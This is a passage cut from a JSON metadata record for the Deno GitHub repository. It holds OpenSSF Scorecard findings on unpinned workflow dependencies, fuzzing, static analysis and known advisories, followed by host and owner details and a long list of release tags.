workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"co